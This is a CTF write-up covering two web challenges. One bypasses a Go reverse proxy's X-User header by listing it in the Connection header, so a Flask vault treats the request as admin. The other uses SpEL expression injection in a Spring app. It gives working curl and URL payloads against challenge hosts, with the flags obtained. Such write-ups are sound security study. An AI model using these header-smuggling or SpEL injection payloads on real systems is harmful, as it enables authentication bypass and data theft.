    return base64.b64encode(data).decode('utf-8')

def verify_password(password: str, salt_b64: str, digest: str) -> bool:
    salt = base64.b64decode(salt_b64.encode('utf-8'))
    return hash_password(password, salt) == digest

def generate_salt() -> bytes:
    return secrets.token_bytes(16)

def create_app() -> Flask:
    app = Flask(__name__)
    app.config['SECRET_KEY'] = secrets.token_hex(32)
    app.config['SQLALCHEMY_DATABASE_URI'] = os.getenv('DATABASE_URL', 'sqlite:///vault.db')
    app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
    app.config['SIGN_SERVER'] = os.getenv('SIGN_SERVER', 'http://127.0.0.1:4444/sign')
    fernet_key = os.getenv('FERNET_KEY')
    if not fernet_key:
        raise RuntimeError('Missing FERNET_KEY environment variable. Generate one with `python -c "from cryptography.fernet import Fernet; print(Fernet.generate_key().decode())"`.')
    app.config['FERNET_KEY'] = fernet_key
    db.init_app(app)
    fernet = Fernet(app.config['FERNET_KEY'])
    with app.app_context():
        db.create_all()
        if not User.query.first():
            salt = secrets.token_bytes(16)
            password = secrets.token_bytes(32).hex()
            password_hash = hash_password(password, salt)
            user = User(
                id=0,
                username='admin',
                password_hash=password_hash,
                salt=base64.b64encode(salt).decode('utf-8'),
            )
            db.session.add(user)
            db.session.commit()
            flag = open('./flag').read().strip()
            flagEntry = VaultEntry(
                user_id=user.id,
                label='flag',
                login='flag',
                password_encrypted=fernet.encrypt(flag.encode('utf-8')).decode('utf-8'),
                notes='This is the flag entry.',
            )
            db.session.add(flagEntry)
            db.session.commit()

    def login_required(view_func):
        @wraps(view_func)
        def wrapped(*args, **kwargs):
            uid = request.headers.get('X-User', '0')
            print(uid)
            if uid == 'anonymous':
                flash('Please sign in first.', 'warning')
                return redirect(url_for('login'))
            try:
                uid_int = int(uid)
            except (TypeError, ValueError):
                flash('Invalid session. Please sign in again.', 'warning')
                return redirect(url_for('login'))
            user = User.query.filter_by(id=uid_int).first()
            if not user:
                flash('User not found. Please sign in again.', 'warning')
                return redirect(url_for('login'))
            g.current_user = user
            return view_func(*args, **kwargs)
        return wrapped

    @app.route('/')
    def index():
        uid = request.headers.get('X-User', '0')
        if not uid or uid == 'anonymous':
            return redirect(url_for('login'))
        return redirect(url_for('dashboard'))

    @app.route('/register', methods=['GET', 'POST'])
    def register():
        if request.method == 'POST':
            username = request.form.get('username', '').strip()
            password = request.form.get('password', '')
            confirm_password = request.form.get('confirm_password', '')
            if not username or not password:
                flash('Username and password are required.', 'danger')
                return render_template('register.html')
            if password != confirm_password:
                flash('Passwords do not match.', 'danger')
                return render_template('register.html')
            salt = generate_salt()
            password_hash = hash_password(password, salt)
            user = User(
                username=username,
                password_hash=password_hash,
                salt=base64.b64encode(salt).decode('utf-8'),
            )
            db.session.add(user)
            try:
                db.session.commit()
            except IntegrityError:
                db.session.rollback()
                flash('Username already exists. Please choose another.', 'warning')
                return render_template('register.html')
            flash('Registration successful. Please sign in.', 'success')
            return redirect(url_for('login'))
        return render_template('register.html')

    @app.route('/login', methods=['GET', 'POST'])
    def login():
        if request.method == 'POST':
            username = request.form.get('username', '').strip()
            password = request.form.get('password', '')
            user = User.query.filter_by(username=username).first()
            if not user or not verify_password(password, user.salt, user.password_hash):
                flash('Invalid username or password.', 'danger')
                return render_template('login.html')
            r = requests.get(app.config['SIGN_SERVER'], params={'uid': user.id}, timeout=5)
            if r.status_code != 200:
                flash('Unable to reach the authentication server. Please try again later.', 'danger')
                return render_template('login.html')
            token = r.text.strip()
            response = make_response(redirect(url_for('dashboard')))
            response.set_cookie(
                'token',
                token,
                httponly=True,
                secure=app.config.get('SESSION_COOKIE_SECURE', False),
                samesite='Lax',
                max_age=12 * 3600,
            )
            return response
        return render_template('login.html')

    @app.route('/logout')
    def logout():
        response = make_response(redirect(url_for('login')))
        response.delete_cookie('token')
        flash('Signed out.', 'info')
        return response

    @app.route('/dashboard')
    @login_required
    def dashboard():
        user = g.current_user
        entries = [
            {
                'id': entry.id,
                'label': entry.label,
                'login': entry.login,
                'password': fernet.decrypt(entry.password_encrypted.encode('utf-8')).decode('utf-8'),
                'notes': entry.notes,
                'created_at': entry.created_at,
            }
            for entry in user.vault_entries
        ]
        return render_template('dashboard.html', username=user.username, entries=entries)

    @app.route('/passwords/new', methods=['POST'])
    @login_required
    def create_password():
        user = g.current_user
        label = request.form.get('label', '').strip()
        login_value = request.form.get('login', '').strip()
        password_plain = request.form.get('password', '').strip()
        notes = request.form.get('notes', '').strip() or None
        if not label or not login_value or not password_plain:
            flash('Service name, login, and password are required.', 'danger')
            return redirect(url_for('dashboard'))
        encrypted_password = fernet.encrypt(password_plain.encode('utf-8')).decode('utf-8')
        entry = VaultEntry(
            user_id=user.id,
            label=label,
            login=login_value,
            password_encrypted=encrypted_password,
            notes=notes,
        )
        db.session.add(entry)
        db.session.commit()
        flash('Password entry saved.', 'success')
        return redirect(url_for('dashboard'))

    @app.route('/passwords/<int:entry_id>', methods=['DELETE'])
    @login_required
    def delete_password(entry_id: int):
        user = g.current_user
        entry = VaultEntry.query.filter_by(id=entry_id, user_id=user.id).first()
        if not entry:
            return jsonify({'success': False, 'message': 'Entry not found'}), 404
        db.session.delete(entry)
        db.session.commit()
        return jsonify({'success': True})

    return app

if __name__ == '__main__':
    flask_app = create_app()
    flask_app.run(host='127.0.0.1', port=5000, debug=False)
The vulnerable endpoint is the /dashboard route:
@app.route('/dashboard')
@login_required
def dashboard():
    user = g.current_user
    entries = [
        {
            'id': entry.id,
            'label': entry.label,
            'login': entry.login,
            'password': fernet.decrypt(entry.password_encrypted.encode('utf-8')).decode('utf-8'),
            'notes': entry.notes,
            'created_at': entry.created_at,
        }
        for entry in user.vault_entries
    ]
    return render_template('dashboard.html', username=user.username, entries=entries)
together with the login_required decorator:
def login_required(view_func):
    @wraps(view_func)
    def wrapped(*args, **kwargs):
        uid = request.headers.get('X-User', '0')
        print(uid)
        if uid == 'anonymous':
            flash('Please sign in first.', 'warning')
            return redirect(url_for('login'))
        try:
            uid_int = int(uid)
        except (TypeError, ValueError):
            flash('Invalid session. Please sign in again.', 'warning')
            return redirect(url_for('login'))
        user = User.query.filter_by(id=uid_int).first()
        if not user:
            flash('User not found. Please sign in again.', 'warning')
            return redirect(url_for('login'))
        g.current_user = user
        return view_func(*args, **kwargs)
    return wrapped
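As shown, only the X-User HTTP header is checked. A value of anonymous is redirected to the login page, and so is anything that is not an integer; any other value is looked up as a user id. Note that a missing header defaults to 0, so 0 is accepted rather than rejected. Continuing the audit, we find the admin user's uid: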
def create_app() -> Flask:
    app = Flask(__name__)
    app.config['SECRET_KEY'] = secrets.token_hex(32)
    app.config['SQLALCHEMY_DATABASE_URI'] = os.getenv('DATABASE_URL', 'sqlite:///vault.db')
    app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
    app.config['SIGN_SERVER'] = os.getenv('SIGN_SERVER', 'http://127.0.0.1:4444/sign')
    fernet_key = os.getenv('FERNET_KEY')
    if not fernet_key:
        raise RuntimeError('Missing FERNET_KEY environment variable. Generate one with `python -c "from cryptography.fernet import Fernet; print(Fernet.generate_key().decode())"`.')
    app.config['FERNET_KEY'] = fernet_key
    db.init_app(app)
    fernet = Fernet(app.config['FERNET_KEY'])
    with app.app_context():
        db.create_all()
        if not User.query.first():
            salt = secrets.token_bytes(16)
            password = secrets.token_bytes(32).hex()
            password_hash = hash_password(password, salt)
            user = User(
                id=0,
                username='admin',
                password_hash=password_hash,
                salt=base64.b64encode(salt).decode('utf-8'),
            )
            db.session.add(user)
            db.session.commit()
            flag = open('./flag').read().strip()
            flagEntry = VaultEntry(
                user_id=user.id,
                label='flag',
                login='flag',
                password_encrypted=fernet.encrypt(flag.encode('utf-8')).decode('utf-8'),
                notes='This is the flag entry.',
            )
            db.session.add(flagEntry)
            db.session.commit()
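Putting the decorator and the seeding code side by side, the decision the Flask side makes for a given X-User value can be modelled without running the app. This is a simplified stand-in: the USERS dictionary and the user alice are invented for illustration, and a plain dict replaces Flask's case-insensitive header object.

```python
# Toy stand-in for the User table: admin is seeded with id 0 in create_app.
USERS = {0: "admin", 1: "alice"}  # "alice" is a made-up example user


def resolve_user(headers, users=USERS):
    """Mirror login_required: return the username that would be served,
    or None when the request would be redirected to /login."""
    uid = headers.get("X-User", "0")  # a missing header falls back to "0"
    if uid == "anonymous":
        return None
    try:
        uid_int = int(uid)
    except (TypeError, ValueError):
        return None
    return users.get(uid_int)


print(resolve_user({"X-User": "anonymous"}))
print(resolve_user({"X-User": "1"}))
print(resolve_user({}))
```

The last call is the interesting one: a request that reaches Flask with no X-User header at all is treated as user 0, the admin.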
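This is the initialization function. It creates the admin user with id 0 and stores the flag in one of admin's vault entries. Simply sending an X-User header does not work, though, because the authentication logic lives in main.go: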
package main

import (
    "crypto/rand"
    "encoding/hex"
    "fmt"
    "log"
    "net/http"
    "net/http/httputil"
    "strings"
    "time"

    "github.com/golang-jwt/jwt/v5"
    "github.com/gorilla/mux"
)

var (
    SecretKey = hex.EncodeToString(RandomBytes(32))
)

type AuthClaims struct {
    jwt.RegisteredClaims
    UID string `json:"uid"`
}

func RandomBytes(length int) []byte {
    b := make([]byte, length)
    if _, err := rand.Read(b); err != nil {
        return nil
    }
    return b
}

func SignToken(uid string) (string, error) {
    t := jwt.NewWithClaims(jwt.SigningMethodHS256, AuthClaims{
        UID: uid,
        RegisteredClaims: jwt.RegisteredClaims{
            Issuer:    "Authorizer",
            Subject:   uid,
            ExpiresAt: jwt.NewNumericDate(time.Now().Add(time.Hour)),
            IssuedAt:  jwt.NewNumericDate(time.Now()),
            NotBefore: jwt.NewNumericDate(time.Now()),
        },
    })
    tokenString, err := t.SignedString([]byte(SecretKey))
    if err != nil {
        return "", err
    }
    return tokenString, nil
}

func GetUIDFromRequest(r *http.Request) string {
    authHeader := r.Header.Get("Authorization")
    if authHeader == "" {
        cookie, err := r.Cookie("token")
        if err == nil {
            authHeader = "Bearer " + cookie.Value
        } else {
            return ""
        }
    }
    if len(authHeader) <= 7 || !strings.HasPrefix(authHeader, "Bearer ") {
        return ""
    }
    tokenString := strings.TrimSpace(authHeader[7:])
    if tokenString == "" {
        return ""
    }
    token, err := jwt.ParseWithClaims(tokenString, &AuthClaims{}, func(token *jwt.Token) (interface{}, error) {
        if _, ok := token.Method.(*jwt.SigningMethodHMAC); !ok {
            return nil, fmt.Errorf("unexpected signing method: %v", token.Header["alg"])
        }
        return []byte(SecretKey), nil
    })
    if err != nil {
        log.Printf("failed to parse token: %v", err)
        return ""
    }
    claims, ok := token.Claims.(*AuthClaims)
    if !ok || !token.Valid {
        log.Printf("invalid token claims")
        return ""
    }
    return claims.UID
}

func main() {
    authorizer := &httputil.ReverseProxy{Director: func(req *http.Request) {
        req.URL.Scheme = "http"
        req.URL.Host = "127.0.0.1:5000"
        uid := GetUIDFromRequest(req)
        log.Printf("Request UID: %s, URL: %s", uid, req.URL.String())
        req.Header.Del("Authorization")
        req.Header.Del("X-User")
        req.Header.Del("X-Forwarded-For")
        req.Header.Del("Cookie")
        if uid == "" {
            req.Header.Set("X-User", "anonymous")
        } else {
            req.Header.Set("X-User", uid)
        }
    }}
    signRouter := mux.NewRouter()
    signRouter.HandleFunc("/sign", func(w http.ResponseWriter, r *http.Request) {
        if !strings.HasPrefix(r.RemoteAddr, "127.0.0.1:") {
            http.Error(w, "Forbidden", http.StatusForbidden)
        }
        uid := r.URL.Query().Get("uid")
        token, err := SignToken(uid)
        if err != nil {
            log.Printf("Failed to sign token: %v", err)
            http.Error(w, "Failed to generate token", http.StatusInternalServerError)
            return
        }
        w.Write([]byte(token))
    }).Methods("GET")
    log.Println("Sign service is running at 127.0.0.1:4444")
    go func() {
        if err := http.ListenAndServe("127.0.0.1:4444", signRouter); err != nil {
            log.Fatal(err)
        }
    }()
    log.Println("Authorizer middleware service is running at :5555")
    if err := http.ListenAndServe(":5555", authorizer); err != nil {
        log.Fatal(err)
    }
}
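This rules out forging either the JWT token or the header directly: whatever X-User header the client sends, the proxy deletes it and sets its own value, and it also checks whether the token is valid.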
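To make the backend side concrete, here is a minimal sketch that models only the decision logic of login_required in plain Python. The function name resolve_uid and the KNOWN_USER_IDS set are hypothetical stand-ins for the Flask view wrapper and the users table, and a plain dict is used where Flask would use case-insensitive headers.

```python
from typing import Mapping, Optional

# Hypothetical stand-in for the users table; only admin (id 0) is known from the source.
KNOWN_USER_IDS = {0}


def resolve_uid(headers: Mapping[str, str]) -> Optional[int]:
    """Return the user id the backend would accept, or None for 'redirect to login'."""
    uid = headers.get("X-User", "0")  # same default as in login_required
    if uid == "anonymous":
        return None
    try:
        uid_int = int(uid)
    except (TypeError, ValueError):
        return None
    return uid_int if uid_int in KNOWN_USER_IDS else None


print(resolve_uid({"X-User": "anonymous"}))  # value the proxy sets without a valid token
print(resolve_uid({"X-User": "abc"}))        # non-integer value
print(resolve_uid({}))                       # header absent: falls back to "0"
```

The only case that resolves to admin without a signed token is the one where X-User never reaches the backend at all, which is exactly what the proxy normally prevents.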
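Finally, list X-User in the Connection header so that it is treated as a connection-specific (hop-by-hop) header. The Director still sets X-User, but Go's ReverseProxy strips the headers named in Connection after the Director has run, so the backend receives no X-User at all and falls back to the default '0', which is admin's uid. This request-smuggling-style trick bypasses the check and returns the flag: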
curl -H 'Connection: close, X-User' 'http://47.94.205.237:22538/dashboard'
flag{2b64dd86-8268-44b5-be04-f541b25d785a}
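The proxy side of the bypass can be sketched in the same spirit. This is a simplified Python model, not the Go implementation: director mirrors the Director function from main.go, while strip_hop_by_hop and forward are hypothetical names for the step in which a reverse proxy drops every header listed in Connection before forwarding. The ordering (Director first, hop-by-hop removal second) is my understanding of httputil.ReverseProxy when Director is used.

```python
from typing import Dict


def director(headers: Dict[str, str], uid: str) -> None:
    """Mimic the Director in main.go: delete client identity headers, then set X-User."""
    for name in ("authorization", "x-user", "x-forwarded-for", "cookie"):
        headers.pop(name, None)
    headers["x-user"] = uid if uid else "anonymous"


def strip_hop_by_hop(headers: Dict[str, str]) -> None:
    """Drop every header named in Connection, then Connection itself."""
    for name in headers.get("connection", "").split(","):
        headers.pop(name.strip().lower(), None)
    headers.pop("connection", None)


def forward(client_headers: Dict[str, str], uid: str = "") -> Dict[str, str]:
    """Return the headers the backend would see (header names lowercased)."""
    headers = {k.lower(): v for k, v in client_headers.items()}
    director(headers, uid)      # runs first and sets x-user
    strip_hop_by_hop(headers)   # runs afterwards and may remove x-user again
    return headers


print(forward({"X-User": "0"}))                    # spoofed header is overwritten
print(forward({"Connection": "close, X-User"}))    # x-user is stripped before forwarding
```

With the second request the backend sees no X-User header, so its default of '0' applies.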
bbjv
Challenge description:
a baby spring
bbjv_bc4ff9919583580cd2476ebd25b3f409.zip
This is a Java code audit of a Spring Framework application.
After decompiling the jar with jd-gui, I gave the contents of the files under the BOOT-INF directory to the chat AI:
Then I pasted in EvaluationService.class:
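The exp it produced was not quite right. After a few more rounds, it turned out that the #{} placeholder can be used to get an expression parsed.
At that point the AI usage quota ran out, so I audited the rest myself.
Next, audit SpelConfig.class: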
package BOOT-INF.classes.com.ctf.gateway.config;

import com.ctf.gateway.accessor.SecurePropertyAccessor;
import java.util.Properties;
import org.springframework.beans.factory.annotation.Qualifier;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.expression.EvaluationContext;
import org.springframework.expression.PropertyAccessor;
import org.springframework.expression.spel.support.SimpleEvaluationContext;

@Configuration
public class SpelConfig {
    @Bean({"systemProperties"})
    public Properties systemProperties() {
        return System.getProperties();
    }

    @Bean({"restrictedEvalContext"})
    public EvaluationContext restrictedEvaluationContext(@Qualifier("systemProperties") Properties systemProperties) {
        SimpleEvaluationContext simpleContext = SimpleEvaluationContext.forPropertyAccessors(new PropertyAccessor[] { (PropertyAccessor)new SecurePropertyAccessor() }).build();
        simpleContext.setVariable("systemProperties", systemProperties);
        return (EvaluationContext)simpleContext;
    }
}
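The bean exposes System.getProperties() to SpEL as the variable systemProperties, so an expression can read some sensitive information. Working with the AI again: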
https://eci-2zeeicuoz4eh6nylfnqg.cloudeci1.ichunqiu.com:8080/check?rule=#{systemProperties['java.home']}
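One thing worth checking with a URL like the one above: a literal # starts the URL fragment, and HTTP clients do not send the fragment to the server, so a #{...} template generally has to be percent-encoded. The sketch below uses only the Python standard library; the host example.invalid is a placeholder, and the writeup does not confirm whether this was the cause of the failure described next.

```python
from urllib.parse import quote, unquote, urlsplit

rule = "#{systemProperties['java.home']}"
raw_url = "http://example.invalid:8080/check?rule=" + rule  # placeholder host

parts = urlsplit(raw_url)
print("query:   ", parts.query)     # what the server would receive
print("fragment:", parts.fragment)  # stays on the client side

# Percent-encode every reserved character so the whole template stays in the query.
encoded_rule = quote(rule, safe="")
encoded_url = "http://example.invalid:8080/check?rule=" + encoded_rule
print(encoded_url)
```

After encoding, urlsplit reports an empty fragment and the full template inside the query string.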
It turned out that this was not initialized correctly, so I kept pressing the AI:
That worked. Next, try to read the flag. Check the Dockerfile in the challenge attachment:
FROM openjdk:21-jdk-slim
WORKDIR /app
COPY app.jar /app/app.jar
COPY flag.txt /tmp/flag.txt
EXPOSE 8080
CMD ["java", "-jar", "app.jar"]
So the flag is in the /tmp directory. Finally, construct the exp:
https://eci-2zeeicuoz4eh6nylfnqg.cloudeci1.ichunqiu.com:8080/check?rule=%23%7B%23systemProperties%5B'user.home'%5D%20%3D%20%23systemProperties%5B'java.io.tmpdir'%5D%7D
flag{b7f891ce-cebe-469d-8ea5-12a0923cbafe}
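For readability, the URL-encoded rule parameter from the exp can be decoded with the standard library. This only shows what expression was sent; it does not reproduce the request.

```python
from urllib.parse import unquote

# The value of the rule parameter, copied from the exp URL above.
encoded_rule = (
    "%23%7B%23systemProperties%5B'user.home'%5D%20%3D%20"
    "%23systemProperties%5B'java.io.tmpdir'%5D%7D"
)

decoded_rule = unquote(encoded_rule)
print(decoded_rule)
# prints: #{#systemProperties['user.home'] = #systemProperties['java.io.tmpdir']}
```

The expression inside #{} is an assignment that copies java.io.tmpdir into user.home through the #systemProperties variable. The writeup does not show how the application then exposes the file under /tmp, so that step is left as in the original.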